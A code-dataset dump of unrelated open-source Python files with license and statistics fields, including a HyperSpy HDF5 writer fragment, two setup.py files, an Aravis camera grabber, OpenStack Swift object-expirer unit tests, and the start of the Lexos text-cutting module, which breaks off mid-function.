dict2hdfgroup(axis_dict, coord_group, **kwds)
mapped_par = group.create_group(metadata)
metadata_dict = signal.metadata.as_dictionary()
overwrite_dataset(group, signal.data, 'data',
signal_axes=signal.axes_manager.signal_indices_in_array,
**kwds)
if default_version < LooseVersion("1.2"):
metadata_dict["_internal_parameters"] = \
metadata_dict.pop("_HyperSpy")
# Remove chunks from the kwds since it wouldn't have the same rank as the
# dataset and can't be used
kwds.pop('chunks', None)
dict2hdfgroup(metadata_dict, mapped_par, **kwds)
original_par = group.create_group(original_metadata)
dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,
**kwds)
learning_results = group.create_group('learning_results')
dict2hdfgroup(signal.learning_results.__dict__,
learning_results, **kwds)
if hasattr(signal, 'peak_learning_results'):
peak_learning_results = group.create_group(
'peak_learning_results')
dict2hdfgroup(signal.peak_learning_results.__dict__,
peak_learning_results, **kwds)
if len(signal.models):
model_group = group.file.require_group('Analysis/models')
dict2hdfgroup(signal.models._models.as_dictionary(),
model_group, **kwds)
for model in model_group.values():
model.attrs['_signal'] = group.name
def file_writer(filename, signal, *args, **kwds):
"""Writes data to hyperspy's hdf5 format
Parameters
----------
filename: str
signal: a BaseSignal instance
*args, optional
**kwds, optional
"""
with h5py.File(filename, mode='w') as f:
f.attrs['file_format'] = "HyperSpy"
f.attrs['file_format_version'] = version
exps = f.create_group('Experiments')
group_name = signal.metadata.General.title if \
signal.metadata.General.title else '__unnamed__'
        # / is an invalid character, see #942
if "/" in group_name:
group_name = group_name.replace("/", "-")
expg = exps.create_group(group_name)
# Add record_by metadata for backward compatibility
smd = signal.metadata.Signal
if signal.axes_manager.signal_dimension == 1:
smd.record_by = "spectrum"
elif signal.axes_manager.signal_dimension == 2:
smd.record_by = "image"
else:
smd.record_by = ""
try:
write_signal(signal, expg, **kwds)
except BaseException:
raise
finally:
del smd.record_by
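# Illustrative usage sketch (assumes the HyperSpy API is importable as
# hyperspy.api; the signal and file name are made up for the example):
#   import numpy as np
#   import hyperspy.api as hs
#   s = hs.signals.Signal1D(np.arange(100.).reshape(10, 10))
#   file_writer('example.hspy', s)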
|
gpl-3.0
| -2,065,360,871,214,329,600
| 38.645885
| 82
| 0.541169
| false
| 4.211391
| false
| false
| false
|
StartTheShift/thunderdome-logging
|
setup.py
|
1
|
1329
|
import sys
from setuptools import setup, find_packages
#next time:
#python setup.py register
#python setup.py sdist upload
version = open('thunderdome_logging/VERSION', 'r').readline().strip()
long_desc = """
Extension for thunderdome which allows error logging in the graph.
"""
setup(
name='thunderdome-logging',
version=version,
description='Thunderdome graph error logging',
dependency_links=['https://github.com/StartTheShift/thunderdome-logging/archive/{0}.tar.gz#egg=thunderdome-logging-{0}'.format(version)],
long_description=long_desc,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='cassandra,titan,ogm,thunderdome,logging',
install_requires=['thunderdome==0.4.3'],
author='StartTheShift',
author_email='dev@shift.com',
url='https://github.com/StartTheShift/thunderdome-logging',
license='BSD',
packages=find_packages(),
include_package_data=True,
)
|
mit
| 7,834,285,208,966,804,000
| 33.076923
| 141
| 0.669676
| false
| 3.797143
| false
| false
| false
|
cubicdaiya/python-q4m
|
python_q4m/__init__.py
|
1
|
1380
|
# -*- coding: utf-8 -*-
import python_q4m
__author__ = "Tatsuhiko Kubo (cubicdaiya@gmail.com)"
__version__ = "0.0.6"
__license__ = "GPL2"
__doc__ = """
This module is a simple Q4M operation wrapper developed by pixiv Inc. for an asynchronous upload system.
A simple usage example follows:
>>> from python_q4m.q4m import *
>>> class QueueTable(Q4M):
>>> def __init__(self, con):
>>> super(self.__class__, self).__init__(con)
>>> self.table = 'queue_table'
>>> self.columns = ['id',
>>> 'msg',
>>> ]
>>> try:
>>> con = MySQLdb.connect(host='localhost',
>>> db=dbname,
>>> user=username,
>>> passwd=password,
>>> )
>>> q = QueueTable(con)
>>> q.enqueue([1, 'msg'])
>>> while q.wait() == 0:
>>> time.sleep(1);
>>> res = q.dequeue()
>>> print res['id']
>>> print res['msg']
>>> q.end()
>>> con.close()
>>> except MySQLdb.Error, e:
>>> print 'Error %d: %s' % (e.args[0], e.args[1])
>>> q.abort()
>>> con.close()
It is necessary to create the following table for the above example.
CREATE TABLE `queue_table` (`id` int(11) NOT NULL, `msg` text NOT NULL) ENGINE=QUEUE;
"""
|
gpl-2.0
| 372,192,313,206,318,800
| 30.363636
| 98
| 0.465942
| false
| 3.424318
| false
| false
| false
|
semeniuta/FlexVi
|
flexvi/daq/aravisgrabber.py
|
1
|
1399
|
from enum import Enum
from gi.repository import Aravis as ar
import aravis as pyar
class AravisEnv:
def __init__(self):
''' Get device IDs and initialize Camera objects '''
ar.update_device_list()
self.device_ids = pyar.get_device_ids()
self.cameras = {i: pyar.Camera(i) for i in self.device_ids}
class AravisGrabber:
States = Enum('States', 'not_initialized not_functional initialized camera_selected')
    current_state = States.not_initialized
current_camera = None
def __init__(self, env):
self.env = env
def select_camera_by_id(self, camera_id):
        if camera_id not in self.env.device_ids:
raise Exception('Incorrect device id provided')
self.current_camera = self.env.cameras[camera_id]
self.current_state = self.States.camera_selected
def select_camera_by_index(self, idx):
        if idx < 0 or idx >= len(self.env.device_ids):
raise Exception('Incorrect device index provided')
self.current_camera = self.env.cameras[self.env.device_ids[idx]]
self.current_state = self.States.camera_selected
def grab_image(self):
print 'Grabbing...'
if self.current_state is not self.States.camera_selected:
raise Exception('No camera has been selected')
im = pyar.get_frame(self.current_camera)
return im
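# Illustrative usage sketch (assumes at least one Aravis-compatible camera is
# reachable; no such hardware is implied by this file):
#   env = AravisEnv()
#   grabber = AravisGrabber(env)
#   grabber.select_camera_by_index(0)
#   frame = grabber.grab_image()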
|
gpl-2.0
| -4,096,126,815,948,293,000
| 35.815789
| 89
| 0.643317
| false
| 3.770889
| false
| false
| false
|
eliostvs/tomate-exec-plugin
|
setup.py
|
1
|
1335
|
#!/bin/env python
import os
from setuptools import setup
def find_xdg_data_files(syspath, relativepath, pkgname, data_files=[]):
for (dirname, _, filenames) in os.walk(relativepath):
if filenames:
syspath = syspath.format(pkgname=pkgname)
subpath = dirname.split(relativepath)[1]
if subpath.startswith("/"):
subpath = subpath[1:]
files = [os.path.join(dirname, f) for f in filenames]
data_files.append((os.path.join(syspath, subpath), files))
return data_files
def find_data_files(data_map, pkgname):
data_files = []
for (syspath, relativepath) in data_map:
find_xdg_data_files(syspath, relativepath, pkgname, data_files)
return data_files
DATA_FILES = [
("share/{pkgname}/plugins", "data/plugins"),
]
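# Illustrative sketch (the plugin file name is hypothetical): with a file
# data/plugins/exec.plugin on disk, find_data_files(DATA_FILES, "tomate")
# produces entries of the form
#   [('share/tomate/plugins/', ['data/plugins/exec.plugin'])]
# which setuptools installs under the shared data directory.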
setup(
author="Elio Esteves Duarte",
author_email="elio.esteves.duarte@gmail.com",
description="Tomate plugin that executes commands when the timer starts, stops or finish",
include_package_data=True,
keywords="pomodoro,tomate",
license="GPL-3",
long_description=open("README.md").read(),
name="tomate-exec-plugin",
data_files=find_data_files(DATA_FILES, "tomate"),
url="https://github.com/eliostvs/tomate-exec-plugin",
version="0.5.0",
zip_safe=False,
)
|
gpl-3.0
| -5,612,258,948,244,956,000
| 26.244898
| 94
| 0.64794
| false
| 3.379747
| false
| false
| false
|
larsbutler/swift
|
test/unit/obj/test_expirer.py
|
1
|
28044
|
# Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from unittest import main, TestCase
from test.unit import FakeRing, mocked_http_conn, debug_logger
from copy import deepcopy
from tempfile import mkdtemp
from shutil import rmtree
import mock
import six
from six.moves import urllib
from swift.common import internal_client, utils, swob
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
internal_client = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda *a, **kw: None
internal_client.sleep = not_sleep
self.rcache = mkdtemp()
self.conf = {'recon_cache_path': self.rcache}
self.logger = debug_logger('test-expirer')
def tearDown(self):
rmtree(self.rcache)
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.old_loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
x.get_process_values(vals)
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
x.get_process_values({})
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
self.obj_containers_in_order = []
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
self.obj_containers_in_order.append(container)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': six.text_type(x)}
for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': six.text_type(x)}
for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
'0': set('1-one 2-two 3-three'.split()),
'1': set('2-two 3-three 4-four'.split()),
'2': set('5-five 6-six'.split()),
'3': set(u'7-seven\u2661'.split()),
}
x = ObjectExpirer(self.conf)
x.swift = InternalClient(containers)
deleted_objects = {}
for i in range(3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers['3'].pop(),
deleted_objects['3'].pop().decode('utf8'))
self.assertEqual(containers, deleted_objects)
self.assertEqual(len(set(x.obj_containers_in_order[:4])), 4)
def test_delete_object(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
actual_obj = 'actual_obj'
timestamp = int(time())
reclaim_ts = timestamp - x.reclaim_age
container = 'container'
obj = 'obj'
http_exc = {
resp_code:
internal_client.UnexpectedResponse(
str(resp_code), swob.HTTPException(status=resp_code))
for resp_code in {404, 412, 500}
}
exc_other = Exception()
def check_call_to_delete_object(exc, ts, should_pop):
x.logger.clear()
start_reports = x.report_objects
with mock.patch.object(x, 'delete_actual_object',
side_effect=exc) as delete_actual:
with mock.patch.object(x, 'pop_queue') as pop_queue:
x.delete_object(actual_obj, ts, container, obj)
delete_actual.assert_called_once_with(actual_obj, ts)
log_lines = x.logger.get_lines_for_level('error')
if should_pop:
pop_queue.assert_called_once_with(container, obj)
self.assertEqual(start_reports + 1, x.report_objects)
self.assertFalse(log_lines)
else:
self.assertFalse(pop_queue.called)
self.assertEqual(start_reports, x.report_objects)
self.assertEqual(1, len(log_lines))
self.assertIn('Exception while deleting object container obj',
log_lines[0])
# verify pop_queue logic on exceptions
for exc, ts, should_pop in [(None, timestamp, True),
(http_exc[404], timestamp, False),
(http_exc[412], timestamp, False),
(http_exc[500], reclaim_ts, False),
(exc_other, reclaim_ts, False),
(http_exc[404], reclaim_ts, True),
(http_exc[412], reclaim_ts, True)]:
try:
check_call_to_delete_object(exc, ts, should_pop)
except AssertionError as err:
self.fail("Failed on %r at %f: %s" % (exc, ts, err))
def test_report(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
x.report()
self.assertEqual(x.logger.get_lines_for_level('info'), [])
x.logger._clear()
x.report(final=True)
self.assertTrue(
'completed' in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' not in str(x.logger.get_lines_for_level('info')))
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue(
'completed' not in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' in str(x.logger.get_lines_for_level('info')))
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.get_lines_for_level('error'),
["Unhandled exception: "])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
"'str' object has no attribute 'get_account_info'")
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_once_unicode_problem(self):
class InternalClient(object):
container_ring = FakeRing()
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return [{'name': u'1234'}]
def iter_objects(*a, **kw):
return [{'name': u'1234-troms\xf8'}]
def make_request(*a, **kw):
pass
def delete_container(*a, **kw):
pass
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests):
x.run_once()
self.assertEqual(len(requests), 3)
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer(self.conf,
logger=self.logger)
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
logs = x.logger.all_log_lines()
self.assertEqual(logs['info'], [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
self.assertTrue('error' not in logs)
# Reverse test to be sure it still would blow up the way expected.
fake_swift = InternalClient([{'name': str(int(time() - 86400))}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'), [
'Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][-1]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'This should not have been called')
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertTrue('error' not in x.logger.all_log_lines())
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = should_not_be_called
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj '
'This should not have been called: ' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.iter_containers = lambda: [str(int(time() - 86400))]
x.delete_actual_object = deliberately_blow_up
x.pop_queue = should_not_get_called
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(
error_lines,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object: ' % (ts, ts)])
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
self.logger._clear()
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = should_not_get_called
x.run_once()
self.assertEqual(
self.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj This should '
'not have been called: ' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-acc/c/actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
with mock.patch('swift.obj.expirer.MAX_OBJECTS_TO_CACHE', 0):
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'),
['Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired'])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, six.text_type):
got_unicode[0] = True
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = delete_actual_object_test_for_unicode
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired',
])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(sorted(error_lines), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container: ' % (cts,),
'Exception while deleting container %d failed to delete '
'container: ' % (cts + 1,)]))
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({}, logger=self.logger)
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.get_lines_for_level('error'),
['Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'exception 1')
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_raises_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_raises_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
'503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
self.assertEqual(x.swift.make_request.call_count, 1)
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.parse.quote(name))
def test_pop_queue(self):
class InternalClient(object):
container_ring = FakeRing()
x = expirer.ObjectExpirer({}, logger=self.logger,
swift=InternalClient())
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests) as fake_conn:
x.pop_queue('c', 'o')
self.assertRaises(StopIteration, fake_conn.code_iter.next)
for method, path in requests:
self.assertEqual(method, 'DELETE')
device, part, account, container, obj = utils.split_path(
path, 5, 5, True)
self.assertEqual(account, '.expiring_objects')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
if __name__ == '__main__':
main()
|
apache-2.0
| 5,540,752,920,553,979,000
| 34.861893
| 78
| 0.54525
| false
| 4.07202
| true
| false
| false
|
TheLady/Lexos
|
processors/prepare/cutter.py
|
1
|
14378
|
import re
from Queue import Queue
from math import ceil
from types import *
WHITESPACE = ['\n', '\t', ' ', '', u'\u3000']
# from helpers.constants import WHITESPACE
def splitKeepWhitespace(string):
"""
Splits the string on whitespace, while keeping the tokens on which the string was split.
Args:
string: The string to split.
Returns:
The split string with the whitespace kept.
"""
return re.split(u'(\u3000|\n| |\t)', string)
# Note: Regex in capture group keeps the delimiter in the resultant list
def countWords(textList): # Ignores WHITESPACE as being 'not words'
"""
Counts the "words" in a list of tokens, where words are anything not in the WHITESPACE global.
Args:
textList: A list of tokens in the text.
Returns:
The number of words in the list.
"""
return len([x for x in textList if x not in WHITESPACE])
def stripLeadingWhiteSpace(q):
"""
Takes in the queue representation of the text and strips the leading whitespace.
Args:
q: The text in a Queue object.
Returns:
None
"""
if not q.empty():
while q.queue[0] in WHITESPACE:
trash = q.get()
if q.empty():
break
def stripLeadingBlankLines(q):
"""
Takes in the queue representation of the text and strips the leading blank lines.
Args:
q: The text in a Queue object.
Returns:
None
"""
while q.queue == '':
trash = q.get()
if q.empty():
break
def stripLeadingCharacters(charQueue, numChars):
"""
Takes in the queue representation of the text and strips the leading numChars characters.
Args:
charQueue: The text in a Queue object.
numChars: The number of characters to remove.
Returns:
None
"""
for i in xrange(numChars):
removedChar = charQueue.get()
def stripLeadingWords(wordQueue, numWords):
"""
Takes in the queue representation of the text and strips the leading numWords words.
Args:
wordQueue: The text in a Queue object.
numWords: The number of words to remove.
Returns:
None
"""
for i in xrange(numWords):
stripLeadingWhiteSpace(wordQueue)
removedWord = wordQueue.get()
stripLeadingWhiteSpace(wordQueue)
def stripLeadingLines(lineQueue, numLines):
"""
Takes in the queue representation of the text and strips the leading numLines lines.
Args:
lineQueue: The text in a Queue object.
numLines: The number of lines to remove.
Returns:
None
"""
for i in xrange(numLines):
stripLeadingBlankLines(lineQueue)
removedLine = lineQueue.get()
stripLeadingBlankLines(lineQueue)
def cutByCharacters(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of characters,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in characters.
overlap: The number of characters to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
for token in text:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingCharacters(charQueue=chunkSoFar, numChars=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue)
if (float(len(lastChunk)) / chunkSize) < lastProp:
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
